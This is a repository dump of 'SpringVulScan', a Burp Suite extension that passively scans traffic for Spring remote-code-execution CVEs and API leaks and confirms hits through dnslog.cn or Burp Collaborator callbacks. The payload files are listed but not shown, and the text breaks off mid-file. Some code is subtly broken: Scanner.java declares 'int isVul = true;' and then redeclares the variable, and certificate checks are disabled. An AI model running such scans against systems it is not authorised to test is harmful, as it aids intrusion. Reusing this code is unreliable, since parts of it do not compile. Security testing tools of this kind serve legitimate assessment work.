├── README.md └── SpingVulScan-1.0 ├── pom.xml └── src └── main └── java └── burp ├── BurpExtender.java ├── DnsLog ├── DnsLogInterface.java ├── ParamsHelpers.java └── Platform │ ├── BurpCollaborator.java │ └── DnsLogCn.java ├── Scan └── Scanner.java ├── SpringIssue.java ├── UI ├── Tags.java └── tabs │ ├── ScanResultsUI.java │ └── SettingUI.java ├── auxiliary ├── CheckIsSpring.java ├── ReadFile.java └── YamlReader.java └── payload ├── Payload.java ├── RCE ├── APIunauthorized.java ├── CloudFramework.java ├── CloudFuncionSpEl.java ├── CloudGatewaySpEl.java ├── DataCommons.java ├── MessagingRCE.java ├── SecurityOAuth2RCE.java └── WebFlowRCE.java └── ScanPayload.java /README.md: -------------------------------------------------------------------------------- 1 | # SpringVulScan 2 | 3 | ##### 喜欢的可以给作者一个start 4 | 5 | ## SpringVulScan--burpsuite插件 6 | ### 更新 7 | #### 1.1 8 | 1、添加自定义根路径扫描。 9 | 2、右键可send to SpringVulScan,自定义字典等。 10 | 3、优化检测思路。 11 | 4、自定义选择不仅可以用来检测路由泄露,也可以用来爆破目录。 12 | 5、直接下载releases的SpringVulScan-1.1.zip解压即可。 13 | ## 写在前边 14 | 15 | 这是我开发的第一款burpsuite插件,本着的目标是为了更好更方便的去检测一些可能存在Spring漏洞的地方。第一次开发它也是遇到了许许多多的问题和困难,从收集互联网关于burpsuite插件开发资料(API,说明文档),到现在基本功能已经能够实现,前后经历了半个月左右的时间(中间也是掺杂了一些其他的琐事)。不过好在现在已将完成了它!!想着自己有时间搞一个burpsuite插件开发的思路(API的使用),内容文档我也会放到GitHub上,以后有时间继续维护它!!下边对其功能和使用方法进行介绍。 16 | 17 | ## 功能介绍 18 | 19 | **界面** 20 | 21 | ![img](https://cdn.nlark.com/yuque/0/2022/png/21739648/1655642522435-9442e040-9680-4a09-ae0b-c691e02ae3fb.png) 22 | 23 | 长相也就一般般,GUI也是搞了一阵子。 24 | 25 | | 功能点 | 介绍 | 26 | | -------- | ------------------------------------------------------------ | 27 | | 基础设置 | 无话可说 | 28 | | 检测方式 | 回显和回连,无话可说。一般情况下基本上全开就行了。 | 29 | | 扫描类型 | 同一站点仅检测一次:默认开启,开启后,同一个站点只进行一次检测,不会因为url的变化而再次检测。过滤检测Spring框架:默认关闭,开启后,自动根据Spring的特性,"whitelabel error page",进行过滤性检测。而不会对其他流量进行再一次扫描。 | 30 | | 编号检测 | 可指定漏洞类型进行检测。 | 31 | | 回连平台 | 目前仅仅支持burpcollaborator,DnsLog.cn。其他平台功能暂未完善。若目标没做流量限制,建议使用burpcollaborator,扫描速度快且结果准确。 | 32 | 33 | ​ **文件目录** 34 | 35 | 
![img](https://cdn.nlark.com/yuque/0/2022/png/21739648/1655643243635-61ed581d-c43e-4b68-8ea8-e78f9e583987.png) 36 | 37 | ```bash 38 | conifg 39 | ------apiRoute.txt 泄露路由检测,可自定义。 40 | ------config.yml CVE漏洞检测payload,部分payload不建议自定义。 41 | SpringVulScan-1.0.jar 42 | ``` 43 | 44 | ​ **检测效果** 45 | 46 | ![img](https://cdn.nlark.com/yuque/0/2022/png/21739648/1655643585846-c399a4fb-ebf4-4b8d-a37b-6a637ed5c179.png) 47 | 48 | 这个面板不是很方便,然后就添加到了仪表盘。所以直接在仪表盘查看是否存在漏洞即可。 49 | 50 | ![img](https://cdn.nlark.com/yuque/0/2022/png/21739648/1655643921940-656462a1-2ab5-496c-bf2d-c527a64df969.png) 51 | 52 | 像*CVE-2022-22965*这种可直接进行利用的,而且便于检测,所以直接报出高危红色即可,像api泄露这种检测起来不是很容易的就在Low和Medium面板。当然Medium面板的概率大于Low面板,相较于更准确些。 53 | 54 | ![img](https://cdn.nlark.com/yuque/0/2022/png/21739648/1655643953534-425a80ad-7c4a-43a6-82fe-61000f4f4f74.png) 55 | 56 | ![img](https://cdn.nlark.com/yuque/0/2022/png/21739648/1655643972721-000088b8-f73a-4c25-8c2e-28a3c4097357.png) 57 | 58 | ## 总结 59 | 60 | 基本的注意点和用法就这么些,初次开发第一个工具,肯定存在一些未知的问题,还请直接提交issue。 61 | 62 | ## 参考 63 | 64 | https://portswigger.net/burp/extender/api/burp/package-summary.html 65 | 66 | https://xz.aliyun.com/t/7065 67 | 68 | 以及一些其他的开源插件 69 | -------------------------------------------------------------------------------- /SpingVulScan-1.0/pom.xml: -------------------------------------------------------------------------------- 1 | 2 | 5 | 4.0.0 6 | 7 | org.example 8 | SpingVulScan 9 | 1.0-SNAPSHOT 10 | 11 | 12 | 8 13 | 8 14 | 15 | 16 | 17 | 18 | net.portswigger.burp.extender 19 | burp-extender-api 20 | 2.3 21 | 22 | 23 | com.github.adedayo.intellij.sdk 24 | forms_rt 25 | 142.1 26 | 27 | 28 | com.github.kevinsawicki 29 | http-request 30 | 6.0 31 | 32 | 33 | org.yaml 34 | snakeyaml 35 | 1.23 36 | 37 | 38 | com.google.guava 39 | guava 40 | 20.0 41 | 42 | 43 | 44 | 45 | 46 | 47 | org.apache.maven.plugins 48 | maven-assembly-plugin 49 | 2.2-beta-5 50 | 51 | 52 | 53 | com.yj.TCPClient.upload.App 54 | 55 | 56 | 57 | jar-with-dependencies 58 | 59 | 60 | 
61 | 62 | 63 | 64 | make-assembly 65 | package 66 | 67 | single 68 | 69 | 70 | 71 | 72 | 73 | 74 | -------------------------------------------------------------------------------- /SpingVulScan-1.0/src/main/java/burp/BurpExtender.java: -------------------------------------------------------------------------------- 1 | package burp; 2 | 3 | import java.io.PrintWriter; 4 | 5 | import burp.UI.Tags; 6 | import burp.Scan.Scanner; 7 | 8 | public class BurpExtender implements IBurpExtender 9 | { 10 | private final String name = "SpringVulScan"; 11 | private final String version = "1.0"; 12 | 13 | public IBurpExtenderCallbacks callbacks; 14 | public IExtensionHelpers helpers; 15 | public PrintWriter stdout; 16 | public PrintWriter stderr; 17 | public Tags tags; 18 | private Scanner scanner;//Scanner 实现了IScannerCheck接口 19 | 20 | 21 | @Override 22 | public void registerExtenderCallbacks(IBurpExtenderCallbacks callbacks) { 23 | this.callbacks = callbacks; 24 | // 设置拓展名称 25 | this.callbacks.setExtensionName(name); 26 | //该方法用于获得一个 IExtensionHelpers目的, 扩展程序可以使用它来执行许多有用的任务。 27 | this.helpers = this.callbacks.getHelpers(); 28 | // 获取输入输出流 29 | this.stderr = new PrintWriter(this.callbacks.getStderr(), true); 30 | this.stdout = new PrintWriter(this.callbacks.getStdout(), true); 31 | // 添加tag标签到ui 32 | this.tags = new Tags(callbacks, this.name); 33 | 34 | // 初始化 scanner 35 | this.scanner = new Scanner(this); 36 | 37 | // 注册 Scanner 38 | this.callbacks.registerScannerCheck(this.scanner); 39 | 40 | //打印插件信息 41 | this.stdout.println(this.extenderInfo()); 42 | } 43 | 44 | 45 | public String extenderInfo(){ 46 | String info = "===========================\n" + 47 | "[+] load successful! 
\n" + 48 | "[+] SpringVulScan V1.0 \n" + 49 | "[+] code by Tptfb11 \n" + 50 | "[+] GitHUub: https://github.com/tpt11fb \n"; 51 | String payload = "目前支持:\n" + 52 | "[+] Spring Core RCE (CVE-2022-22965)\n" + 53 | "[+] Spring Cloud Function SpEL RCE (CVE-2022-22963)\n" + 54 | "[+] Spring Cloud GateWay SPEL RCE (CVE-2022-22947)\n" + 55 | "[+] Spring Security OAuth2 RCE (CVE-2016-4977)\n" + 56 | "[+] API 未授权、泄露\n" + 57 | "===========================\n"; 58 | return info + payload; 59 | } 60 | } -------------------------------------------------------------------------------- /SpingVulScan-1.0/src/main/java/burp/DnsLog/DnsLogInterface.java: -------------------------------------------------------------------------------- 1 | package burp.DnsLog; 2 | 3 | public interface DnsLogInterface { 4 | String getTempDomain(); 5 | 6 | String getBodyContent() throws InterruptedException; 7 | 8 | boolean checkResult() throws InterruptedException; 9 | 10 | String outExport(); 11 | 12 | void export(); 13 | } 14 | -------------------------------------------------------------------------------- /SpingVulScan-1.0/src/main/java/burp/DnsLog/ParamsHelpers.java: -------------------------------------------------------------------------------- 1 | package burp.DnsLog; 2 | 3 | public class ParamsHelpers { 4 | public static String getParam(String d, String paramName) { 5 | if (d != null && d.length() != 0) { 6 | String value = "test=test;" + d; 7 | int length = value.length(); 8 | int start = value.indexOf(59) + 1; 9 | if (start != 0 && start != length) { 10 | int end = value.indexOf(59, start); 11 | if (end == -1) { 12 | end = length; 13 | } 14 | 15 | while(start < end) { 16 | int nameEnd = value.indexOf(61, start); 17 | if (nameEnd != -1 && nameEnd < end && paramName.equals(value.substring(start, nameEnd).trim())) { 18 | String paramValue = value.substring(nameEnd + 1, end).trim(); 19 | int valueLength = paramValue.length(); 20 | if (valueLength != 0) { 21 | if (valueLength > 2 && '"' == 
paramValue.charAt(0) && '"' == paramValue.charAt(valueLength - 1)) { 22 | return paramValue.substring(1, valueLength - 1); 23 | } 24 | 25 | return paramValue; 26 | } 27 | } 28 | 29 | start = end + 1; 30 | end = value.indexOf(59, start); 31 | if (end == -1) { 32 | end = length; 33 | } 34 | } 35 | 36 | return null; 37 | } else { 38 | return null; 39 | } 40 | } else { 41 | return null; 42 | } 43 | } 44 | } 45 | -------------------------------------------------------------------------------- /SpingVulScan-1.0/src/main/java/burp/DnsLog/Platform/BurpCollaborator.java: -------------------------------------------------------------------------------- 1 | package burp.DnsLog.Platform; 2 | 3 | import burp.IBurpCollaboratorClientContext; 4 | import burp.IBurpCollaboratorInteraction; 5 | import burp.IBurpExtenderCallbacks; 6 | import burp.IExtensionHelpers; 7 | import burp.DnsLog.DnsLogInterface; 8 | import java.io.PrintWriter; 9 | import java.util.Iterator; 10 | import java.util.List; 11 | import java.util.Map; 12 | 13 | public class BurpCollaborator implements DnsLogInterface { 14 | private IBurpExtenderCallbacks callbacks; 15 | private IExtensionHelpers helpers; 16 | private IBurpCollaboratorClientContext burpCollaboratorClientContext; 17 | private String dnsLogName; 18 | private String tempDomain; 19 | private String dnslogContent = null; 20 | 21 | public BurpCollaborator(IBurpExtenderCallbacks callbacks) { 22 | this.callbacks = callbacks; 23 | this.helpers = callbacks.getHelpers(); 24 | this.dnsLogName = "http://burpcollaborator.net/"; 25 | this.burpCollaboratorClientContext = callbacks.createBurpCollaboratorClientContext(); 26 | this.init(); 27 | } 28 | 29 | public void init() { 30 | this.tempDomain = this.burpCollaboratorClientContext.generatePayload(true); 31 | if (this.tempDomain == null || this.tempDomain.length() <= 0) { 32 | throw new RuntimeException(String.format("请检查本机是否可使用burp自带的dnslog客户端,%s", this.dnsLogName)); 33 | } 34 | } 35 | 36 | public String 
getTempDomain() {
37 | return this.tempDomain;
38 | }
39 |
40 | /* Pulls the Collaborator interactions recorded for tempDomain and folds the properties of the
   FIRST interaction into dnslogContent (iterator.next() is called once, so any further interactions
   returned by the same fetch are discarded). The "raw_query" property is base64-decoded before use.
   Returns the accumulated dnslogContent, which stays null until something has been recorded.
   NOTE(review): content starts as null and dnslogContent is initialised to null, so the string
   concatenations below yield text prefixed with the literal "null". checkResult() only tests for
   non-null, so the verdict is unaffected, but the text itself is polluted. Everything appended here
   was sent by whoever resolved or requested the payload domain — treat it as untrusted input
   wherever it is displayed or parsed. */
public String getBodyContent() {
41 | List collaboratorInteractions = this.burpCollaboratorClientContext.fetchCollaboratorInteractionsFor(this.getTempDomain());
42 | if (collaboratorInteractions != null && !collaboratorInteractions.isEmpty()) {
43 | Iterator iterator = collaboratorInteractions.iterator();
44 | Map properties = ((IBurpCollaboratorInteraction)iterator.next()).getProperties();
45 | if (properties.size() == 0) {
46 | return this.dnslogContent;
47 | } else {
48 | String content = null;
49 |
50 | String text;
51 | /* The for-update clause appends each value; order follows the Map's key iteration. */
for(Iterator var5 = properties.keySet().iterator(); var5.hasNext(); content = content + text + " ") {
52 | String property = (String)var5.next();
53 | text = (String)properties.get(property);
54 | if (property.equals("raw_query")) {
55 | /* new String(byte[]) decodes with the platform default charset. */
text = new String(this.helpers.base64Decode(text));
56 | }
57 | }
58 |
59 | this.dnslogContent = this.dnslogContent + content;
60 | return this.dnslogContent;
61 | }
62 | } else {
63 | return this.dnslogContent;
64 | }
65 | }
66 |
67 | /* True once any interaction has ever been folded into dnslogContent. */
public boolean checkResult() {
68 | return this.getBodyContent() != null;
69 | }
70 |
71 | /* One-line summary for the results view: only the payload domain. */
public String outExport() {
72 | return String.format("BurpDnsLog Domain: %s", this.getTempDomain());
73 | }
74 |
75 | /* Writes the payload domain to the extension's stdout; nothing else is printed. */
public void export() {
76 | PrintWriter stdout = new PrintWriter(this.callbacks.getStdout(), true);
77 | stdout.println("");
78 | stdout.println("===========BurpDnsLog扩展详情===========");
79 | stdout.println(String.format("BurpDnsLog临时域名: %s", this.getTempDomain()));
80 | stdout.println("===================================");
81 | stdout.println("");
82 | }
83 | }
84 |
-------------------------------------------------------------------------------- /SpingVulScan-1.0/src/main/java/burp/DnsLog/Platform/DnsLogCn.java: --------------------------------------------------------------------------------
1 | package burp.DnsLog.Platform;
2 |
3 | import burp.BurpExtender;
4 | import burp.DnsLog.DnsLogInterface;
5 | import
burp.DnsLog.ParamsHelpers; 6 | import com.github.kevinsawicki.http.HttpRequest; 7 | import java.io.PrintWriter; 8 | 9 | public class DnsLogCn implements DnsLogInterface { 10 | private BurpExtender burpExtender; 11 | private String dnslogDomainName; 12 | private String tempDomain; 13 | private String dnsLogCookieName; 14 | private String dnsLogCookieValue; 15 | 16 | public DnsLogCn(BurpExtender burpExtender) throws InterruptedException { 17 | this.burpExtender = burpExtender; 18 | this.dnslogDomainName = "http://www.dnslog.cn/"; 19 | this.init(); 20 | } 21 | 22 | public void init() throws InterruptedException { 23 | int i = 0; 24 | 25 | while(i < 3) { 26 | try { 27 | String url = this.dnslogDomainName + "/getdomain.php"; 28 | String userAgent = "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"; 29 | HttpRequest request = HttpRequest.get((CharSequence)url); 30 | request.trustAllCerts(); 31 | request.trustAllHosts(); 32 | request.followRedirects(false); 33 | request.header("User-Agent", userAgent); 34 | request.header("Accept", "*/*"); 35 | request.readTimeout(3000); 36 | request.connectTimeout(3000); 37 | this.tempDomain = request.body(); 38 | String cookie = request.header("Set-Cookie"); 39 | String sessidKey = "PHPSESSID"; 40 | String sessidValue = ParamsHelpers.getParam(cookie, sessidKey); 41 | this.dnsLogCookieName = sessidKey; 42 | this.dnsLogCookieValue = sessidValue; 43 | break; 44 | } catch (RuntimeException var8) { 45 | this.burpExtender.stdout.println("尝试第" + i + "次请求DnsLogCn平台,失败!"); 46 | Thread.sleep(3000L); 47 | var8.printStackTrace(); 48 | ++i; 49 | } 50 | } 51 | 52 | } 53 | 54 | public String getTempDomain() { 55 | return this.tempDomain; 56 | } 57 | 58 | public String getBodyContent() throws InterruptedException { 59 | int i = 0; 60 | 61 | while(i < 3) { 62 | try { 63 | String url = this.dnslogDomainName + "/getrecords.php"; 64 | String userAgent = "Mozilla/5.0 (Windows NT 6.2; WOW64) 
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36";
65 | HttpRequest request = HttpRequest.get((CharSequence)url);
66 | /* NOTE(review): these two calls disable certificate and hostname verification for the request.
   dnslogDomainName is set to "http://www.dnslog.cn/" in the constructor (outside this chunk), so no
   TLS is involved today; if the base URL is ever switched to https, carrying these calls over would
   leave the session cookie and the records readable by anyone able to intercept the connection —
   remove them rather than keep them. */
request.trustAllCerts();
67 | request.trustAllHosts();
68 | request.followRedirects(false);
69 | request.header("User-Agent", userAgent);
70 | request.header("Accept", "*/*");
71 | /* PHPSESSID captured in init(); it is what ties getrecords.php to our temporary domain. */
request.header("Cookie", this.dnsLogCookieName + "=" + this.dnsLogCookieValue + ";");
72 | request.readTimeout(30000);
73 | request.connectTimeout(30000);
74 | String body = request.body();
75 | /* "[]" is treated as "no record yet"; any other body is returned verbatim to the caller. */
if (body.equals("[]")) {
76 | return null;
77 | }
78 |
79 | return body;
80 | /* NOTE(review): catch (Exception) also swallows an NPE from body.equals when body is null. After
   three failures the method falls through to return null below, which checkResult() reports as
   "no callback" — a platform outage becomes a false negative. Consider distinguishing "could not
   query the platform" from "no record". */
} catch (Exception var6) {
81 | this.burpExtender.stdout.println("尝试第" + i + "次请求DnsLogCn平台,失败!");
82 | Thread.sleep(3000L);
83 | var6.printStackTrace();
84 | ++i;
85 | }
86 | }
87 |
88 | return null;
89 | }
90 |
91 | /* True when getrecords.php returned something other than "[]" for the temporary domain.
   Propagates InterruptedException from the retry sleep. */
public boolean checkResult() throws InterruptedException {
92 | return this.getBodyContent() != null;
93 | }
94 |
95 | /* Multi-line summary of this platform session for the results view. NOTE(review): it includes the
   PHPSESSID value; whoever can read this text can read our DNS records for this session, so avoid
   copying it into shared reports. */
public String outExport() {
96 | String exp1 = String.format("dnsLog域名: %s", this.dnslogDomainName);
97 | String exp2 = String.format("dnsLog保存记录的api接口: %s", this.dnslogDomainName + "/getrecords.php");
98 | String exp3 = String.format("cookie: %s=%s", this.dnsLogCookieName, this.dnsLogCookieValue);
99 | String exp4 = String.format("dnsLog临时域名: %s", this.getTempDomain());
100 | return exp1 + "\n" + exp2 + "\n" + exp3 + "\n" + exp4;
101 | }
102 |
103 | /* Same details as outExport(), written to the extension's stdout — including the session cookie. */
public void export() {
104 | PrintWriter stdout = new PrintWriter(this.burpExtender.callbacks.getStdout(), true);
105 | stdout.println("");
106 | stdout.println("===========dnsLog扩展详情===========");
107 | stdout.println(String.format("dnsLog域名: %s", this.dnslogDomainName));
108 | stdout.println(String.format("dnsLog保存记录的api接口: %s", this.dnslogDomainName + "/getrecords.php"));
109 | stdout.println(String.format("cookie: %s=%s", this.dnsLogCookieName, this.dnsLogCookieValue));
110 | stdout.println(String.format("dnsLog临时域名: %s", this.getTempDomain()));
111 |
stdout.println("==================================="); 112 | stdout.println(""); 113 | } 114 | } 115 | -------------------------------------------------------------------------------- /SpingVulScan-1.0/src/main/java/burp/Scan/Scanner.java: -------------------------------------------------------------------------------- 1 | package burp.Scan; 2 | 3 | import burp.BurpExtender; 4 | import burp.IExtensionHelpers; 5 | import burp.IHttpRequestResponse; 6 | import burp.IRequestInfo; 7 | import burp.IScanIssue; 8 | import burp.IScannerCheck; 9 | import burp.IScannerInsertionPoint; 10 | import burp.auxiliary.CheckIsSpring; 11 | import burp.payload.ScanPayload; 12 | import java.io.FileNotFoundException; 13 | import java.util.ArrayList; 14 | import java.util.HashSet; 15 | import java.util.List; 16 | import java.util.Set; 17 | 18 | public class Scanner implements IScannerCheck { 19 | private BurpExtender burpExtender; 20 | private IExtensionHelpers helpers; 21 | private String vulName; 22 | private CheckIsSpring checkIsSpring; 23 | private final Set Scan = new HashSet(); 24 | 25 | public Scanner(BurpExtender burpExtender) { 26 | this.burpExtender = burpExtender; 27 | this.helpers = this.burpExtender.helpers; 28 | this.checkIsSpring = new CheckIsSpring(this.burpExtender, this.helpers); 29 | } 30 | 31 | public List doPassiveScan(IHttpRequestResponse iHttpRequestResponse) { 32 | if (!this.burpExtender.tags.getSettingUi().isEnable()) { 33 | return null; 34 | } else { 35 | try { 36 | boolean filterSpring = this.burpExtender.tags.getSettingUi().isCheckSpring(); 37 | boolean checkOne = this.burpExtender.tags.getSettingUi().isCheckAll(); 38 | if (filterSpring && checkOne) { 39 | if (!this.checkRepeat(iHttpRequestResponse)) { 40 | if (!this.checkIsSpring.isSpring(iHttpRequestResponse, "", false) && !this.checkIsSpring.isSpring(iHttpRequestResponse, "", true) && !this.checkIsSpring.isSpring(iHttpRequestResponse, "oauth/authorize", false)) { 41 | 
this.burpExtender.stdout.println("未检测到Spring框架" + this.helpers.analyzeRequest(iHttpRequestResponse).getUrl());
42 | return null;
43 | } else {
44 | return this.doScan(iHttpRequestResponse);
45 | }
46 | } else {
47 | this.burpExtender.stdout.println("流量已扫描");
48 | return null;
49 | }
50 | /* "same site once" on, Spring filter off: each host is scanned once, without fingerprinting. */
} else if (!filterSpring && checkOne) {
51 | if (!this.checkRepeat(iHttpRequestResponse)) {
52 | return this.doScan(iHttpRequestResponse);
53 | } else {
54 | this.burpExtender.stdout.println("流量已扫描");
55 | return null;
56 | }
57 | /* Spring filter on, "same site once" off: every request is fingerprinted and scanned on a hit. */
} else if (filterSpring) {
58 | if (!this.checkIsSpring.isSpring(iHttpRequestResponse, "", false) && !this.checkIsSpring.isSpring(iHttpRequestResponse, "", true) && !this.checkIsSpring.isSpring(iHttpRequestResponse, "oauth/authorize", false)) {
59 | this.burpExtender.stdout.println("未检测到Spring框架");
60 | return null;
61 | } else {
62 | return this.doScan(iHttpRequestResponse);
63 | }
64 | /* Both options off: every request seen is scanned. */
} else {
65 | return this.doScan(iHttpRequestResponse);
66 | }
67 | /* NOTE(review): InterruptedException is swallowed without restoring the interrupt flag
   (Thread.currentThread().interrupt()), so a cancelled scan thread carries on with the next callback
   as if nothing happened. The log text ("plugin failed to start") is also misleading for a
   FileNotFoundException raised while loading payloads at scan time. */
} catch (InterruptedException | FileNotFoundException var4) {
68 | var4.printStackTrace();
69 | this.burpExtender.stdout.println("插件启动失败!!");
70 | return null;
71 | }
72 | }
73 | }
74 |
75 | /* Runs the configured checks against one request and returns the resulting IScanIssue list (empty
   when nothing was found or when both check modes are disabled). Although called from doPassiveScan,
   it builds a ScanPayload for the request, which — judging by its name and the "正在测试" log — sends
   probes to the target (ScanPayload is not in this chunk; confirm). If so, passive traffic triggers
   active requests: gate this on this.burpExtender.callbacks.isInScope(requestInfo.getUrl()) so that
   only in-scope hosts are probed. The declared exceptions come from the payload loader and from the
   callback-platform waits. */
public List doScan(IHttpRequestResponse iHttpRequestResponse) throws FileNotFoundException, InterruptedException {
76 | List issues = new ArrayList();
77 | IRequestInfo requestInfo = this.helpers.analyzeRequest(iHttpRequestResponse);
78 | String url = String.valueOf(requestInfo.getUrl());
79 | /* The host key is recorded BEFORE any check runs, so a failed or aborted scan still marks the host
   as done for checkRepeat(). Scan is a plain HashSet; if Burp invokes doPassiveScan from several
   threads (likely, but not visible here) this needs synchronisation. */
this.Scan.add(this.deelUrl(String.valueOf(requestInfo.getUrl())));
80 | boolean isErrorCheck = this.burpExtender.tags.getSettingUi().isErrorCheck();
81 | boolean isReverseCheck = this.burpExtender.tags.getSettingUi().isReverseCheck();
82 | /* Neither echo-based nor callback-based checking is enabled: log it and return the empty list. */
if (!isErrorCheck && !isReverseCheck) {
83 | this.burpExtender.stdout.println(String.format("[-] 检测失败: %s", url));
84 | } else {
85 | this.burpExtender.stdout.println(String.format("[*] 加载完毕,正在测试: %s", url));
86 | /* Register a pending row in the results tab; save() overwrites it once the verdict is known. */
int id = this.burpExtender.tags.getScannerUi().add("ALL",
requestInfo.getMethod(), url, String.valueOf(this.helpers.analyzeResponse(iHttpRequestResponse.getResponse()).getStatusCode()), "[-] 等待扫描结果,请稍后。。。。", iHttpRequestResponse); 87 | int isVul = true; 88 | ScanPayload scanPayload = new ScanPayload(this.burpExtender, this.helpers, iHttpRequestResponse); 89 | int isVul = scanPayload.getIsVul(); 90 | if (isVul == -1) { 91 | this.burpExtender.tags.getScannerUi().save(id, "ALL", requestInfo.getMethod(), String.valueOf(requestInfo.getUrl()), String.valueOf(this.helpers.analyzeResponse(iHttpRequestResponse.getResponse()).getStatusCode()), "[-] 不存在Spring漏洞", iHttpRequestResponse); 92 | } else { 93 | IHttpRequestResponse requestResponse; 94 | if (isVul == 0) { 95 | issues.add(scanPayload.getVulDetails()); 96 | this.vulName = scanPayload.getVulDetails().getIssueName(); 97 | requestResponse = scanPayload.getVulHttp(); 98 | this.burpExtender.tags.getScannerUi().save(id, "ALL", requestInfo.getMethod(), String.valueOf(requestInfo.getUrl()), String.valueOf(this.helpers.analyzeResponse(requestResponse.getResponse()).getStatusCode()), String.format("[?] %s 可能存在漏洞 (需要进一步手动验证)", this.vulName), requestResponse); 99 | } else if (isVul == 1) { 100 | issues.add(scanPayload.getVulDetails()); 101 | this.vulName = scanPayload.getVulDetails().getIssueName(); 102 | requestResponse = scanPayload.getVulHttp(); 103 | this.burpExtender.tags.getScannerUi().save(id, "ALL", requestInfo.getMethod(), String.valueOf(requestInfo.getUrl()), String.valueOf(this.helpers.analyzeResponse(requestResponse.getResponse()).getStatusCode()), String.format("[+] 存在 %s 漏洞! ! 
", this.vulName), requestResponse);
104 | } else {
105 | /* getIsVul() returned something other than -1/0/1: the check did not complete and the pending
   row in the results tab is left as it is. */
this.burpExtender.stdout.println("未完成检测!");
106 | }
107 | }
108 | }
109 |
110 | return issues;
111 | }
112 |
113 | /* No active-scan checks are provided; all work happens in doPassiveScan/doScan. */
public List doActiveScan(IHttpRequestResponse iHttpRequestResponse, IScannerInsertionPoint iScannerInsertionPoint) {
114 | return null;
115 | }
116 |
117 | /* 0 tells Burp to keep both issues, so repeated findings for the same URL are never merged. */
public int consolidateDuplicateIssues(IScanIssue iScanIssue, IScanIssue iScanIssue1) {
118 | return 0;
119 | }
120 |
121 | /* Extracts host[:port] from a URL string by skipping "https://" (8 chars) or "http://" (7 chars)
   and cutting at the next "/". NOTE(review): when no "/" follows the authority, indexOf returns -1
   and substring throws StringIndexOutOfBoundsException, which doPassiveScan does not catch; a scheme
   other than http/https is sliced as if it were http. requestInfo.getUrl().getHost()/getPort() would
   avoid the string slicing altogether. */
public String deelUrl(String url) {
122 | return url.startsWith("https") ? url.substring(8, url.indexOf("/", 8)) : url.substring(7, url.indexOf("/", 8));
123 | }
124 |
125 | /* True if this request's host has already been handed to doScan(). The key is the host alone, so
   with "same site once" enabled only the first URL seen per host is ever scanned. The complete Scan
   set is logged on every call — noisy on large targets. */
public boolean checkRepeat(IHttpRequestResponse httpRequestResponse) {
126 | IRequestInfo requestInfo = this.helpers.analyzeRequest(httpRequestResponse);
127 | String url = this.deelUrl(String.valueOf(requestInfo.getUrl()));
128 | this.burpExtender.stdout.println("获取标识::" + url);
129 | this.burpExtender.stdout.println("已获取的标识::" + this.Scan);
130 | return this.Scan.contains(url);
131 | }
132 | }
133 |
-------------------------------------------------------------------------------- /SpingVulScan-1.0/src/main/java/burp/SpringIssue.java: --------------------------------------------------------------------------------
1 | package burp;
2 |
3 | import java.net.URL;
4 |
5 | /* Dashboard display: plain IScanIssue value object handed to Burp's scanner/dashboard; every getter
   returns the corresponding constructor argument unchanged. Burp treats the detail and background
   texts as HTML, so any target-derived text placed in them must be escaped by the caller (the
   construction sites are outside this chunk). */
6 | public class SpringIssue implements IScanIssue {
7 |
8 | private URL url;
9 | private String issueName;
10 | private int issueType;
11 | private String severity;
12 | private String confidence;
13 | private String issueBackground;
14 | private String remediationBackground;
15 | private String issueDetail;
16 | private String remediationDetail;
17 | private IHttpRequestResponse[] httpMessages;
18 | private IHttpService httpService;
19 |
20 | public SpringIssue(URL url, String issueName, int issueType, String severity, String confidence, String issueBackground, String remediationBackground, String issueDetail, String remediationDetail, IHttpRequestResponse[] httpMessages,
IHttpService httpService) { 21 | this.url = url; 22 | this.issueName = issueName; 23 | this.issueType = issueType; 24 | this.severity = severity; 25 | this.confidence = confidence; 26 | this.issueBackground = issueBackground; 27 | this.remediationBackground = remediationBackground; 28 | this.issueDetail = issueDetail; 29 | this.remediationDetail = remediationDetail; 30 | this.httpMessages = httpMessages; 31 | this.httpService = httpService; 32 | } 33 | 34 | @Override 35 | public URL getUrl() { 36 | return this.url; 37 | } 38 | 39 | @Override 40 | public String getIssueName() { 41 | return this.issueName; 42 | } 43 | 44 | @Override 45 | public int getIssueType() { 46 | return this.issueType; 47 | } 48 | 49 | @Override 50 | public String getSeverity() { 51 | return this.severity; 52 | } 53 | 54 | @Override 55 | public String getConfidence() { 56 | return this.confidence; 57 | } 58 | 59 | @Override 60 | public String getIssueBackground() { 61 | return this.issueBackground; 62 | } 63 | 64 | @Override 65 | public String getRemediationBackground() { 66 | return this.remediationBackground; 67 | } 68 | 69 | @Override 70 | public String getIssueDetail() { 71 | return this.issueDetail; 72 | } 73 | 74 | @Override 75 | public String getRemediationDetail() { 76 | return this.remediationDetail; 77 | } 78 | 79 | @Override 80 | public IHttpRequestResponse[] getHttpMessages() { 81 | return this.httpMessages; 82 | } 83 | 84 | @Override 85 | public IHttpService getHttpService() { 86 | return this.httpService; 87 | } 88 | } 89 | -------------------------------------------------------------------------------- /SpingVulScan-1.0/src/main/java/burp/UI/Tags.java: -------------------------------------------------------------------------------- 1 | package burp.UI; 2 | 3 | import burp.IBurpExtenderCallbacks; 4 | import burp.ITab; 5 | import burp.UI.tabs.ScanResultsUI; 6 | import burp.UI.tabs.SettingUI; 7 | import java.awt.Component; 8 | import javax.swing.JTabbedPane; 9 | 10 | public class 
Tags implements ITab { 11 | private final JTabbedPane tabs; 12 | private String name; 13 | private IBurpExtenderCallbacks callbacks; 14 | private SettingUI settingUI; 15 | private ScanResultsUI scanResultsUI; 16 | 17 | public Tags(IBurpExtenderCallbacks callbacks, String name) { 18 | this.callbacks = callbacks; 19 | this.name = name; 20 | this.tabs = new JTabbedPane(); 21 | this.settingUI = new SettingUI(callbacks, this.tabs); 22 | this.scanResultsUI = new ScanResultsUI(callbacks, this.tabs); 23 | this.callbacks.addSuiteTab(this); 24 | this.callbacks.customizeUiComponent(this.tabs); 25 | } 26 | 27 | public SettingUI getSettingUi() { 28 | return this.settingUI; 29 | } 30 | 31 | public ScanResultsUI getScannerUi() { 32 | return this.scanResultsUI; 33 | } 34 | 35 | public String getTabCaption() { 36 | return this.name; 37 | } 38 | 39 | public Component getUiComponent() { 40 | return this.tabs; 41 | } 42 | } 43 | -------------------------------------------------------------------------------- /SpingVulScan-1.0/src/main/java/burp/UI/tabs/ScanResultsUI.java: -------------------------------------------------------------------------------- 1 | package burp.UI.tabs; 2 | 3 | import burp.IBurpExtenderCallbacks; 4 | import 